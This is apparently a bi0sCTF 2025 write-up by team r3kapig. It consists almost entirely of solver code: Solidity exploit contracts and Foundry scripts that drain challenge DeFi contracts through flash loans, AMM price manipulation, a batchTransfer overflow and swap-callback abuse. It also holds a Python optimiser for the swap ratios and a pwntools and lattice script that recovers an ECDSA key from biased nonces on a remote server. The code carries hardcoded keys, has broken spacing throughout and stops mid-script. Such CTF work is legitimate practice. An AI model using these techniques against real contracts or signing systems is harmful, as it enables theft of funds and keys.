bi0sCTF 2025 Writeup by r3kapig

// SPDX-License-Identifier: UNLICENSEDpragma solidity ^0.8.19;
import"./core/Setup.sol";import"./Killer.sol";import"./core/tokens/Hacker.sol";
contract Attacker {    Hacker public hacker_coin;    IBi0sSwapPair public wethHackPair;
    constructor() payable {}
    function attack(address _setup) external payable {        Setup setup = Setup(_setup);        USDSEngine usdsEngine = setup.usdsEngine();        SafeMoon safeMoon = setup.safeMoon();        WETH weth = setup.weth();        bytes32 FLAG_HASH = keccak256("YOU NEED SOME BUCKS TO GET FLAG");        uint256 targetValue = uint256(FLAG_HASH) + 1;
        setup.setPlayer(address(this));
        Killer killer = new Killer();        uint256 killerAddress = uint160(address(killer));
        hacker_coin = new Hacker(2 * killerAddress);        weth.deposit{value: 1 ether}(address(this));        wethHackPair = IBi0sSwapPair(            setup.bi0sSwapFactory().createPair(                address(weth),                address(hacker_coin)            )        );        hacker_coin.transfer(address(wethHackPair), 2 * killerAddress);        weth.transfer(address(wethHackPair), 1);        wethHackPair.addLiquidity(address(this));
        weth.approve(address(wethHackPair), type(uint256).max);        weth.approve(address(usdsEngine), type(uint256).max);        usdsEngine.depositCollateralThroughSwap(            address(weth),            address(hacker_coin),            1,            0        );        killer.Kill(            address(usdsEngine),            address(this),            address(weth),            killerAddress + targetValue,            targetValue        );        killer.Kill(            address(usdsEngine),            address(this),            address(safeMoon),            killerAddress + targetValue,            targetValue        );        usdsEngine.collateralDeposited(            address(this),            usdsEngine.collateralTokens(0)        );        usdsEngine.collateralDeposited(            address(this),            usdsEngine.collateralTokens(1)        );        setup.isSolved();    }}

// SPDX-License-Identifier: MITpragma solidity ^0.8.20;
import {CTFSolver} from "forge-ctf/CTFSolver.sol";import"./core/Setup.sol";import"./Attacker.sol";
/**CHALLENGE=0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512 forge script src/bi0sctf2025/Transient-Heist/Exploit.s.sol:Exploit --rpc-url $ETH_RPC_URL --broadcast -vvvvv */
contract Exploit is CTFSolver {    function solve(address challenge, address player) internal override{        Attacker attacker = new Attacker{value: 2 ether}();        attacker.attack(challenge);    }}

// SPDX-License-Identifier: UNLICENSEDpragma solidity ^0.8.19;
import {USDSEngine} from "./core/USDSEngine.sol";
contract Killer {    function Kill(        address _usdsEngine,        address sender,        address collateralToken,        uint256 amountOut,        uint256 collateralDepositAmount    ) external {        bytes memory data = abi.encode(collateralDepositAmount);        USDSEngine(_usdsEngine).bi0sSwapv1Call(            sender,            collateralToken,            amountOut,            data        );    }}

// SPDX-License-Identifier: UNLICENSEDpragma solidity ^0.8.19;
import"./core/Setup.sol";import"./Killer.sol";import"./core/tokens/Hacker.sol";
contract Attacker {    Hacker hacker_coin;    IBi0sSwapPair safeMoonHackPair;
    constructor() payable {}
    function attack(address _setup, bytes32 salt) external payable {        Setup setup = Setup(_setup);        USDSEngine usdsEngine = setup.usdsEngine();        SafeMoon safeMoon = setup.safeMoon();        WETH weth = setup.weth();        IBi0sSwapPair wethSafeMoonPair = setup.wethSafeMoonPair();        bytes32 FLAG_HASH = keccak256("YOU NEED SOME BUCKS TO GET FLAG");        uint256 targetValue = uint256(FLAG_HASH) + 1;
        setup.setPlayer(address(this));
        address killer;        bytes memory bytecode = type(Killer).creationCode;        assembly {            killer := create2(0, add(bytecode, 0x20), mload(bytecode), salt)        }        uint256 killerAddress = uint160(killer);
        hacker_coin = new Hacker(2 * 1207000603499873710129495113646411976443);        weth.deposit{value: 80000 ether}(address(this));        weth.approve(address(wethSafeMoonPair), type(uint256).max);        wethSafeMoonPair.swap(            address(weth),            weth.balanceOf(address(this)),            address(this),            abi.encodePacked("")        );        safeMoonHackPair = IBi0sSwapPair(            setup.bi0sSwapFactory().createPair(                address(hacker_coin),                address(safeMoon)            )        );        hacker_coin.transfer(            address(safeMoonHackPair),            1207000603499873710129495113646411976443 - killerAddress        );        safeMoon.transfer(            address(safeMoonHackPair),            safeMoon.balanceOf(address(this))        );        safeMoonHackPair.addLiquidity(address(this));        hacker_coin.approve(address(usdsEngine), type(uint256).max);        usdsEngine.depositCollateralThroughSwap(            address(hacker_coin),            address(safeMoon),            killerAddress,            0        );        Killer(killer).Kill(            address(usdsEngine),            address(this),            address(weth),            killerAddress + targetValue,            targetValue        );        Killer(killer).Kill(            address(usdsEngine),            address(this),            address(safeMoon),            killerAddress + targetValue,            targetValue        );        usdsEngine.collateralDeposited(            address(this),            usdsEngine.collateralTokens(0)        );        usdsEngine.collateralDeposited(            address(this),            usdsEngine.collateralTokens(1)        );        setup.isSolved();    }}

// SPDX-License-Identifier: MITpragma solidity ^0.8.20;
import {CTFSolver} from "forge-ctf/CTFSolver.sol";import"./core/Setup.sol";import"./Attacker.sol";
/**using ERADICATE2 to bruteforce create2's salt./ERADICATE2 -A 0x8464135c8F25Da09e49BC8782676a84730C318bC -I 0x6080604052348015600e575f5ffd5b5061030f8061001c5f395ff3fe608060405234801561000f575f5ffd5b5060043610610029575f3560e01c8063da543c731461002d575b5f5ffd5b61004760048036038101906100429190610171565b610049565b005b5f8160405160200161005b91906101f7565b60405160208183030381529060405290508573ffffffffffffffffffffffffffffffffffffffff1663389bc44f868686856040518563ffffffff1660e01b81526004016100ab949392919061028f565b5f604051808303815f87803b1580156100c2575f5ffd5b505af11580156100d4573d5f5f3e3d5ffd5b50505050505050505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61010d826100e4565b9050919050565b61011d81610103565b8114610127575f5ffd5b50565b5f8135905061013881610114565b92915050565b5f819050919050565b6101508161013e565b811461015a575f5ffd5b50565b5f8135905061016b81610147565b92915050565b5f5f5f5f5f60a0868803121561018a576101896100e0565b5b5f6101978882890161012a565b95505060206101a88882890161012a565b94505060406101b98882890161012a565b93505060606101ca8882890161015d565b92505060806101db8882890161015d565b9150509295509295909350565b6101f18161013e565b82525050565b5f60208201905061020a5f8301846101e8565b92915050565b61021981610103565b82525050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6102618261021f565b61026b8185610229565b935061027b818560208601610239565b61028481610247565b840191505092915050565b5f6080820190506102a25f830187610210565b6102af6020830186610210565b6102bc60408301856101e8565b81810360608301526102ce8184610257565b90509594505050505056fea26469706673582212209a10d1e786162f32ac2219babe3c4cc632ac1dcf45705756052f07dfd6f7987564736f6c634300081c0033 --leading 0
CHALLENGE=0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512 forge script src/bi0sctf2025/Transient-Heist-Revenge/Exploit.s.sol:Exploit --rpc-url $ETH_RPC_URL --broadcast -vvvvv */
contract Exploit is CTFSolver {    function solve(address challenge, address player) internal override{        // Attacker attacker = new Attacker{value: 80000 ether}();        Attacker attacker = Attacker(            0x8464135c8F25Da09e49BC8782676a84730C318bC        );        attacker.attack(            challenge,            bytes32(                0x5105163d73bc3b218daef504edaa346cbd28f4cc35099e5f25f08a8c7ef7ff99            )        );    }}

// SPDX-License-Identifier: MITpragma solidity ^0.8.20;
import {CTFSolver} from "forge-ctf/CTFSolver.sol";import"./Setup.sol";
/**CHALLENGE=0x5FbDB2315678afecb367f032d93F642f64180aa3 forge script src/bi0sctf2025/Empty-Vessel/Exploit.s.sol:Exploit --rpc-url $ETH_RPC_URL --broadcast -vvvvv */
contract Exploit is CTFSolver {    function solve(address challenge, address player) internal override{        Setup setup = Setup(challenge);        Stake stake = setup.stake();        INR inr = setup.inr();
        setup.claim();
        address[] memory receivers = new address[](10);        receivers[0] = player;        for (uint256 i = 1; i < receivers.length; i++) {            receivers[i] = address(uint160(1));        }        inr.batchTransfer(            receivers,            11579208923731619542357098500868790785326998466564056403945758400791312963994        );        inr.balanceOf(player);
        inr.approve(address(stake), type(uint256).max);        inr.transfer(address(stake), 100_000 ether);        stake.deposit(2, player);        setup.stakeINR();        setup.solve();        setup.isSolved();    }}

init0 = 50000 * 10**18init1 = 230000 * init0
tga=100000 * 1e18tgb=230000 * 100000 * 1e18classLP:    def__init__(self):        self.balance0 = 0        self.balance1 = 0    defmint(self, amount0, amount1):        self.balance0 += amount0        self.balance1 += amount1    defburn(self, share):        r = (self.balance0 * share, self.balance1 * share)        self.balance0 -= self.balance0 * share        self.balance1 -= self.balance1 * share        return r    defswap(self, intoken, amount):        k = self.balance0 * self.balance1        if intoken == 0:            self.balance0 += amount            ret = self.balance1 - k / self.balance0            self.balance1 = k / self.balance0            return ret        else:            self.balance1 += amount            ret = self.balance0 - k / self.balance1            self.balance0 = k / self.balance1            return ret        defprice(self):        return self.balance1 / self.balance0DEBUG = Falsedefsim1(r0,r1,r2,r3):    lp = LP()    lp.mint(50000000000000000000000, 11500000000000000000000000000)    bal0 = 49996000000000999915653    bal1 = 0    c0=bal0*r0    c1=bal0*r1    bal0 -= c0+c1    bal1 += lp.price() * c0    if bal1 > init1:        return -1    ce = lp.swap(1, bal1)    bal1 = bal0*lp.price()    if ce+c1 > init0:        return -1    bal1 += lp.swap(0,ce+c1)    bal0 = bal1/lp.price()    bal1 = 0    bal0 += 10000*(10**18)    c0 = bal0 * r2    bal0 -= c0    c1 = bal0 * r3    bal0 -= c1    bal1 = lp.price() * c0    if bal1 > init1:        return -1    ce = lp.swap(1, bal1)    bal1 = bal0 * lp.price()    if ce + c1 > init0:        return -1    bal1 += lp.swap(0, ce + c1)    bal0 = (bal1-tgb) / lp.price()    bal1 = 0    if DEBUG:        print(f"r0: {r0}, r1: {r1}, r2: {r2}, r3: {r3}")        print(lp.balance0/1e18, lp.balance1/1e18)    return bal0defsim2(r0,r1,r2,r3,r4):    lp = LP()    lp.mint(50000000000000000000000, 11500000000000000000000000000)    bal0 = 49996000000000999915653    bal0 += 10000*(10**18)    bal1 = 0    c0=bal0*r0    bal1 += lp.price() * (bal0 - c0)    if c0 > init0:        return -1    bal1 += lp.swap(0, c0)    c1 = bal1 * r1    bal0 = (bal1 - c1) / lp.price()    if c1 > init1:        return -1    bal0 += lp.swap(1, c1)    bal1 = 0        c2 = bal0 * r2    bal1 += lp.price() * (bal0 - c2)    if c2 > init0:        return -1    bal1 += lp.swap(0, c2)    c3 = bal1 * r3    bal0 = (bal1 - c3) / lp.price()    if c3 > init1:        return -1    bal0 += lp.swap(1, c3)    bal1 = 0    # r4 = 0.2    c4 = bal0 * r4    bal1 += lp.price() * (bal0 - c4)    lp.balance0 += c4    bal0 = (bal1 - tgb) / lp.price()    if DEBUG:        print(f"r0: {r0}, r1: {r1}, r2: {r2}, r3: {r3}")        print(lp.balance0/1e18, lp.balance1/1e18)    return bal0defflsim(r):    lp = LP()    lp.mint(50000000000000000000000, 11500000000000000000000000000)    bal0 = 12500 * (10**18)    bal1 = 11500000000000000000000000000    c0 = bal0 * r    bal0 -= c0    balx = lp.swap(1, bal1)    bal1 = bal0 * lp.price()    lp.swap(0, balx + c0)    bal0 = bal1 / lp.price()    return bal0print(flsim(0)/1e18)print(flsim(0.001)/1e18)# print(sim(0.2,0.3,0.2,0.2)/1e18)sim = sim2ACCR1 = 20ACCR2 = 20ACCR3 = 20bestv = 0bestpair = None# for i in range(50,60):    # for j in range(1,10):# for i in range(1,100):#     for j in range(1,100):#         r0 = i/100#         r1 = j/100for i inrange(1,ACCR1):    for j inrange(1,ACCR1):        r0 = i/ACCR1        r1 = j/ACCR1        if r0+r1 > 0.9:            break        for ii inrange(1,ACCR2):            for jj inrange(1,ACCR2):                r2 = ii/ACCR2                r3 = jj/ACCR2                if r2+r3 > 0.95:                    break                for kk inrange(1,ACCR3):                    r4 = kk/ACCR3                    res = sim(r0,r1,r2,r3,r4)                    if res > bestv:                        bestv = res                        bestpair = (r0, r1, r2, r3, r4)print(f"Best value: {bestv/1e18} for pair {bestpair[0]}{bestpair[1]}{bestpair[2]}{bestpair[3]}{bestpair[4]}")DEBUG = Trueprint(sim(bestpair[0], bestpair[1], bestpair[2], bestpair[3], bestpair[4]) / 1e18)

//SPDX-License-Identifier:MITpragma solidity ^0.8.20;
import {Script,console} from"forge-std/Script.sol";import"./Deploy.s.sol";import"src/Setup.sol";import"src/Finance.sol";contract bro {    constructor() payable {    }    function calls(address _target, bytes memory data) public payable {        address payable target = payable(_target);        (bool success, bytes memory returndata) = target.call{value:msg.value}(data);        require(success, "call failed");    }    fallback() external payable {}    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {        return this.onERC721Received.selector;    }}contract Flusher{    DEX public dex;    Finance public finance;    IERC20 public WETH;    IERC20 public INR;    constructor(address _dex, address _finance, address _WETH, address _INR) {        // require(msg.value == 1 ether, "Must send 1 ether");        dex = DEX(_dex);        finance = Finance(_finance);        WETH = IERC20(_WETH);        INR = IERC20(_INR);    }    function init() public {        WETH.transferFrom(msg.sender, address(this), 100 gwei);        WETH.transfer(address(dex), 50 gwei);    }    function flush() public {        WETH.transfer(address(dex), 1 gwei);        dex.sync();    }    function fake() public {        WETH.transfer(address(dex), 1 gwei);        INR.transfer(address(dex), 1 gwei);    }}contract hacker {    Setup public ch;    DEX public dex;    Finance public finance;    IERC20 public WETH;    IERC20 public INR;    Flusher public flusher;    uint ctx;    uint gbal;    constructor(address _ch) payable {        ch = Setup(_ch);        dex = DEX(ch.dex());        finance = Finance(ch.finance());        WETH = IERC20(ch.WETH());        INR = IERC20(ch.INR());    }    function _sqrt(uint x) internal pure returns (uint) {        if (x == 0) return0;        uint z = (x + 1) / 2;        uint y = x;        while (z < y) {            y = z;            z = (x / z + z) / 2;        }        return y;    }    function getBestAmount(uint balance,uint reserve) internal pure returns (uint) {        uint dt=balance*balance+2*balance*reserve+4*reserve*reserve;        uint rt=_sqrt(dt);        uint rv=(balance+rt-2*reserve)/3;        require(rv>0, "not enough balance");        require(rv<=balance, "too much balance");        return rv;    }    function sell(IERC20 token, uint amount) internal returns (uint) {        token.transfer(address(dex), amount);        uint am=dex.swap(            address(token),            amount,            0,            address(this)        );        return am;    }    function work1f() public {        uint lpr1=WETH.balanceOf(address(dex));        uint lpr2=INR.balanceOf(address(dex));        console.log("lpr1:", lpr1);        console.log("lpr2:", lpr2);        ch.claimBonus1();        console.log("current balance:", address(this).balance);        finance.flashLoan(            IERC3156FlashBorrower(address(this)),            address(INR),            2_30_000 * 50_000 ether,            ""        );    }    function flush() public {        flusher.flush();    }    function work2() public {        // flusher.flush();        INR.transfer(address(dex), 1 gwei);        dex.sync();        INR.transfer(address(finance), INR.balanceOf(address(this)));        finance.withdraw(address(INR), INR.balanceOf(address(this)));        console.log("balance after flashloan:", address(this).balance);                uint sb=address(this).balance;        finance.stake{value: sb}(address(WETH));        ch.claimBonus2();        WETH.transfer(address(finance), WETH.balanceOf(address(this)));        finance.withdraw(address(WETH), WETH.balanceOf(address(this)));        console.log("final balance:", address(this).balance);    }    function work3() public {        uint myb=address(this).balance-100 gwei;        uint lpb=WETH.balanceOf(address(dex));        uint mnb=getBestAmount(myb, lpb);        if(mnb>50_000 ether)        {            mnb=50_000 ether;        }        // mnb=(2*myb-lpb)/3;        mnb = 44*myb/100;        require(mnb>0, "not enough balance");        console.log("mnb:", mnb);                ctx=mnb;        gbal=myb;        finance.stake{value: mnb+100 gwei}(address(WETH));        flusher = new Flusher(address(dex), address(finance), address(WETH), address(INR));        WETH.approve(address(flusher), type(uint256).max);        flusher.init();        // flusher.flush();        finance.stake{value: myb-mnb}(address(INR));    }    function work4() public {        WETH.transfer(address(dex), ctx);        uint am=dex.swap(            address(WETH),            ctx,            0,            address(this)        );        uint om=INR.balanceOf(address(this));        am = INR.balanceOf(address(this))*46/100;        // INR.transfer(address(finance), INR.balanceOf(address(this)));        // finance.withdraw(address(INR), INR.balanceOf(address(this)));        INR.transfer(address(finance), om-am);        finance.withdraw(address(INR), om-am);        INR.transfer(address(dex), am);        uint xb=dex.swap(            address(INR),            am,            0,            address(this)        );        WETH.transfer(address(finance), xb);        finance.withdraw(address(WETH), xb);        uint sb=address(this).balance;        console.log("balance after work4:", sb);    }    function work4m() public {        uint myb=address(this).balance;        uint lpb=WETH.balanceOf(address(dex));        uint mnb=getBestAmount(myb, lpb);        if(mnb>50_000 ether)        {            mnb=50_000 ether;        }        // mnb=(2*myb-lpb)/3;        mnb = 46*myb/100;        require(mnb>0, "not enough balance");        console.log("mnb:", mnb);                flusher.flush();        finance.stake{value: myb-mnb}(address(INR));        ctx=mnb;        gbal=myb;        finance.stake{value: mnb}(address(WETH));    }    function work5() public {        WETH.transfer(address(dex), ctx);        uint am=dex.swap(            address(WETH),            ctx,            0,            address(this)        );        uint om=INR.balanceOf(address(this));        am = INR.balanceOf(address(this))*48/100;        // INR.transfer(address(finance), INR.balanceOf(address(this)));        // finance.withdraw(address(INR), INR.balanceOf(address(this)));        INR.transfer(address(finance), om-am);        finance.withdraw(address(INR), om-am);        INR.transfer(address(dex), am);        uint xb=dex.swap(            address(INR),            am,            0,            address(this)        );        WETH.transfer(address(finance), xb);        finance.withdraw(address(WETH), xb);        uint sb=address(this).balance;        console.log("balance after work5-1:", sb);    }    function xmint(uint ethamo) internal returns (uint){        WETH.transfer(address(dex),ethamo);        flusher.fake();        uint lp=dex.mint(address(this));        return lp;    }    function work6() public {        flusher.flush();        uint myb=address(this).balance;        uint lpb=WETH.balanceOf(address(dex));        uint mnb=getBestAmount(myb, lpb);        if(mnb>50_000 ether)        {            mnb=50_000 ether;        }        mnb=myb*20/100;        require(mnb>0, "not enough balance");        console.log("mnb:", mnb);                finance.stake{value: myb-mnb}(address(INR));        ctx=mnb;        finance.stake{value: mnb}(address(WETH));    }    function work7() public {        WETH.transfer(address(dex), ctx);        dex.sync();        uint lpr1=WETH.balanceOf(address(dex));        uint lpr2=INR.balanceOf(address(dex));        console.log("lpr1:", lpr1);        console.log("lpr2:", lpr2);        // console.log("xlp:", xlp);        console.log("all lp:", dex.totalSupply());        uint om=INR.balanceOf(address(this))-2_30_000 * 100_000 ether;        // uint om=INR.balanceOf(address(this));        INR.transfer(address(finance), om/2);        finance.withdraw(address(INR), om/2);        uint svb=address(this).balance;        finance.stake{value: svb}(address(WETH));        INR.transfer(address(finance), om/2);        finance.withdraw(address(INR), om/2);        uint xb=WETH.balanceOf(address(this));        console.log("totb:", address(this).balance+xb);        xb = xb - 100_000 ether;        WETH.transfer(address(finance), xb);        finance.withdraw(address(WETH), xb);        uint sb=address(this).balance;        console.log("balance after work7:", sb);        ch.setPlayer(address(this));        ch.solve();    }    function onFlashLoan(address initiator, IERC20 token, uint256 amount, uint256 fee, bytes calldata data) external returns (bytes32) {        INR.transfer(address(dex), amount);        uint am=dex.swap(            address(INR),            amount,            0,            address(this)        );        uint wb=address(this).balance;        finance.stake{value: wb}(address(INR));        WETH.transfer(address(dex), am);        dex.swap(            address(WETH),            am,            0,            address(this)        );        console.log("try to repay", INR.balanceOf(address(this)), amount);        INR.approve(msg.sender, type(uint256).max);        return keccak256("ERC3156FlashBorrower.onFlashLoan");    }    receive() external payable {    }}contract Solve is Script {    function run() public {        uint sk=0x05c0c4dcb15c2021d29c294a5ac7365cac00ed176e1c9ce64d24804a8396a7dd;        vm.startBroadcast(sk);        address player=vm.addr(sk);        console.log(player);        Setup ch=Setup(0xAE5034fdA74B102efB660Bd2F15ad34faf168BB8);        // Setup ch=new Setup{value : 2_72_500 ether}();        vm.warp(block.timestamp + 70);        // hacker h=new hacker(address(ch));        hacker h=new hacker{value: 0.2 ether}(address(ch));        // hacker h = hacker(payable(0x6D9C21cf43dB084da8486844A4Aa9fdC54e508cf));        Finance f=Finance(ch.finance());        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work1f();        vm.warp(block.timestamp + 60);        vm.sleep(61_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work2();        h.work3();        vm.warp(block.timestamp + 60);        vm.sleep(65_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work4();        vm.warp(block.timestamp + 60);        vm.sleep(65_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work4m();        vm.warp(block.timestamp + 60);        vm.sleep(65_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work5();        vm.warp(block.timestamp + 60);        vm.sleep(65_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work6();        vm.warp(block.timestamp + 60);        vm.sleep(65_000);        f.snapshot();        vm.warp(block.timestamp + 10);        vm.sleep(1_000);        h.work7();        require(ch.isSolved(), "not solved");        vm.stopBroadcast();    }}

//SPDX-License-Identifier:MITpragma solidity ^0.8.20;
import {Script,console} from "forge-std/Script.sol";import"./Deploy.s.sol";import"src/core/Setup.sol";import"src/core/Balancer.sol";contract bro {    constructor() payable {    }    function calls(address _target, bytes memory data)public payable {        address payable target = payable(_target);        (bool success, bytes memory returndata) = target.call{value:msg.value}(data);        require(success, "call failed");    }    fallback() external payable {}    function onERC721Received(address, address, uint256, bytes calldata) external returns(bytes4){        returnthis.onERC721Received.selector;    }}contract hacker {    Setup public ch;    VasthavikamainaToken public VSTETH;    WhiteListed public whiteListed;    LamboToken public lamboToken1;    LamboToken public lamboToken2;    LamboToken public lamboToken3;    WETH9 public wETH9;    Balancer public balancer;    IUniswapV2Pair public uniPair1;    IUniswapV2Pair public uniPair2;    IUniswapV2Pair public uniPair3;    Factory public factory;    uint public cstage;    constructor(address _ch) payable {        ch = Setup(_ch);        VSTETH = ch.VSTETH();        whiteListed = ch.whilteListed();        lamboToken1 = ch.lamboToken1();        lamboToken2 = ch.lamboToken2();        lamboToken3 = ch.lamboToken3();        wETH9 = ch.wETH9();        balancer = ch.balancer();        uniPair1 = ch.uniPair1();        uniPair2 = ch.uniPair2();        uniPair3 = ch.uniPair3();        factory = ch.factory();    }    function work(uint st)public{        cstage = st;        uint cb=address(this).balance;        IERC20[] memory tokens = new IERC20[](1);        tokens[0] = IERC20(address(wETH9));        uint256[] memory amounts = new uint256[](1);        amounts[0] = wETH9.balanceOf(address(balancer));        balancer.flashloan(IFlashLoanRecipient(address(this)),            tokens,            amounts,            ""            );                ch.setPlayer(address(this));        console.log("my balance delta is %s", address(this).balance - cb);        // require(ch.isSolved(), "not solved");        require(address(this).balance - cb > 0.01 ether, "not enough balance");    }    function workquote(LamboToken lamboToken, IUniswapV2Pair uniPair) internal{        uint mybalance = address(this).balance;        uint aout = whiteListed.buyQuote{value: mybalance}(address(lamboToken), mybalance, 0);        lamboToken.approve(address(factory), type(uint256).max);        lamboToken.approve(address(whiteListed), type(uint256).max);        factory.addVasthavikamainaLiquidity(address(VSTETH), address(lamboToken), 300 ether, 0);        uint lb=lamboToken.balanceOf(address(this));        console.log("lamboToken balance is %s", lb);        console.log("out is %s", aout);        uint reservelb=lamboToken.balanceOf(address(uniPair));        uint reservevsteth=VSTETH.balanceOf(address(uniPair));        uint sb=reservevsteth*reservelb/(320 ether)-reservelb;        sb = sb * 1003 / 1000; // accounting for fees        if( sb > lb) {            sb = lb;        }        console.log("sellQuote amount is %s", sb);        whiteListed.sellQuote(address(lamboToken), sb, 0);        console.log("my balance after sell is %s", address(this).balance);        console.log("delta is %s", address(this).balance - mybalance);    }    function receiveFlashLoan(IERC20[] memory _tokens, uint256[] memory _amounts, uint256[] memory _fees, bytes memory _data) external {        uint tob = _amounts[0]+ _fees[0];        wETH9.withdraw(address(this),wETH9.balanceOf(address(this)));        uint mybalance = address(this).balance;        console.log("my balance is %s", mybalance);        if(cstage==0)        {            workquote(lamboToken1, uniPair1);        }        elseif(cstage==1)        {            workquote(lamboToken2, uniPair2);        }        elseif(cstage==2)        {            workquote(lamboToken3, uniPair3);        }        else        {            revert("Invalid stage");        }        // workquote(lamboToken1, uniPair1);        // workquote(lamboToken2, uniPair2);        // workquote(lamboToken3, uniPair3);        wETH9.deposit{value: tob}(address(this));        wETH9.transfer(msg.sender, tob);    }    receive() external payable {    }}contract Solve is Script {    function run()public{        uint sk=0xfc1b660d8413db55235c4110b216df98e3c28282c450ddac8fdc6b727ad63bb9;        address player=vm.addr(sk);        console.log(player);        Setup ch=Setup(0x1504025D9328cBF43b9BEf4a74CEa4eE8b856568);        // Setup ch=new Setup();        vm.startBroadcast(sk);        uint mybalance=player.balance-0.1 ether;        console.log("my balance is %s", mybalance);        if(mybalance > 10 ether) {            mybalance = 10 ether;        }        hacker h=new hacker{value: mybalance}(address(ch));        h.work(0);        vm.roll(100);        h.work(1);        vm.roll(101);        h.work(2);        require(ch.isSolved(), "not solved");        vm.stopBroadcast();    }}

def full_noncense_gen(self) -> tuple:    k_m1 = self.real_bits(24)    k_m2 = self.real_bits(24)     k_m3 = self.real_bits(69)     k_m4 = self.real_bits(30) 
    k_, cycle_1 = self.sec_real_bits(32)    _k, cycle_2 = self.sec_real_bits(32)
    benjamin1, and1, eq1 = self.partial_noncense_gen(32, 16, 16)    benjamin2, and2, eq2 = self.partial_noncense_gen(32 ,16 ,16)
    const_list = [k_m1, (benjamin1 >> 24 & 0xFF), k_m2, (benjamin1 >> 16 & 0xFF) , k_, (benjamin1 >> 8 & 0xFF), k_m3, (benjamin1 & 0xFF), k_m4, (benjamin2 >> 24 & 0xFFF), _k]    shift_list = [232, 224, 200, 192, 160, 152, 83, 75, 45, 33, 0]
    n1 = [and1, eq1]    n2 = [and2, eq2]    cycles = [cycle_1, cycle_2]
    noncense = 0    forconst, shift in zip(const_list, shift_list):        noncense += const << shift    return noncense, n1, n2, cycles   

def privkey_gen(self) -> int:    simple_lcg = lambda x: (x * 0xeccd4f4fea74c2b057dafe9c201bae658da461af44b5f04dd6470818429e043d + 0x8aaf15) % self.n
    ifnot self.cinit:        RNG_seed = simple_lcg(CORE)        self.n_gen = self.supreme_RNG(RNG_seed)        RNG_gen = next(self.n_gen)        self.cinit += 1    else:        RNG_gen = next(self.n_gen)               
    p1 = hex(self.real_bits(108))    p2 = hex(self.real_bits(107))[2:]
    priv_key = p1 + RNG_gen[:5] + p2 + RNG_gen[5:]
    returnint(priv_key, 16)

from Crypto.Util.number import bytes_to_long as b2lfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import padfrom Crypto.Random.random import getrandbitsfrom hashlib import sha256import json
CORE = 0xb4587f9bd72e39c54d77b252f96890f2347ceff5cb6231dfaadb94336df08dfdp = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2fa = 0x0000000000000000000000000000000000000000000000000000000000000000b = 0x0000000000000000000000000000000000000000000000000000000000000007Gx = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798Gy = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141h = 0x1
def supreme_RNG(seed: int, length: int = 10):    while True:        str_seed = str(seed) if len(str(seed)) % 2 == 0else'0' + str(seed)        sqn = str(seed**2)        mid = len(str_seed) >> 1        start = (len(sqn) >> 1) - mid        end = (len(sqn) >> 1) + mid           yield sqn[start : end].zfill(length)        seed = int(sqn[start : end])

from pwn import remote, context, processfrom ast import literal_eval
context.log_level = "critical"
sh = remote("13.233.255.238", 4002)#sh = process(["python3", "chall.py"])
#################################################################################################### make blood 160simple_lcg = lambda x: (x * 0xeccd4f4fea74c2b057dafe9c201bae658da461af44b5f04dd6470818429e043d + 0x8aaf15) % nRNG_seed = simple_lcg(CORE)n_gen = supreme_RNG(RNG_seed)RNG_gen = next(n_gen)for i in range(3):    sh.recvuntil(b"Expecting Routine in JSON format: ")    msg = {"event": "perform_deadcoin"}    msg = json.dumps(msg).encode()    sh.sendline(msg)    sh.recvuntil(b"deadcoin: (")    power, speed = literal_eval("(" + sh.recvline().strip().decode())    feedbacker_parry = int(next(n_gen))    sh.sendline(str(feedbacker_parry).encode())
#################################################################################################### signsigs = []for i in range(5):    sh.recvuntil(b"Expecting Routine in JSON format: ")    msg = {"event": "call_the_signer"}    msg = json.dumps(msg).encode()    sh.sendline(msg)    sh.recvuntil(b"What do you wish to speak? ")    sh.sendline(b"msg")    sig = literal_eval(sh.recvline().strip().decode())    sigs.append(sig)
#################################################################################################### get flagsh.recvuntil(b"Expecting Routine in JSON format: ")msg = {"event": "get_encrypted_flag"}msg = json.dumps(msg).encode()sh.sendline(msg)enc_flag = literal_eval(sh.recvline().strip().decode())
#################################################################################################### handle datar = []s = []benjamin = []Hmsg = sha256()Hmsg.update(b"msg")h = b2l(Hmsg.digest())for sig in sigs:    r.append(sig["r"])    s.append(sig["s"])    benjamin.append([sig['nonce_gen_consts'][0][1], sig['nonce_gen_consts'][1][1]])

from Crypto.Util.number import *nums = 5
d_ = int("5455600000000000000000000000000025000", 16) + 2^255
L = Matrix(ZZ, 2+nums*6+1, 2+nums*6+1)for i in range(nums):    benjamin1, benjamin2 = benjamin[i]    const_list = [0, (benjamin1 >> 24 & 0xFF), 0, (benjamin1 >> 16 & 0xFF) , 0, (benjamin1 >> 8 & 0xFF), 0, (benjamin1 & 0xFF), 0, (benjamin2 >> 24 & 0xFFF), 0]    shift_list = [232, 224, 200, 192, 160, 152, 83, 75, 45, 33, 0]    noncense = 2^255    forconst, shift in zip(const_list[:-2], shift_list[:-2]):        if(shift not in [232, 200, 160, 83, 45, 0]):            noncense += ((2*const+1) << (shift-1))    noncense += (benjamin2 >> 24 & 0xFFF) << 33    noncense += 2^31    ti = noncense
    exps = [232, 200, 160, 83, 45][::-1]    Ai1 = r[i]*inverse(s[i], n)*2^20    Ai2 = r[i]*inverse(s[i], n)*2^148    Bi = h*inverse(s[i], n) + r[i]*inverse(s[i], n)*d_ - ti
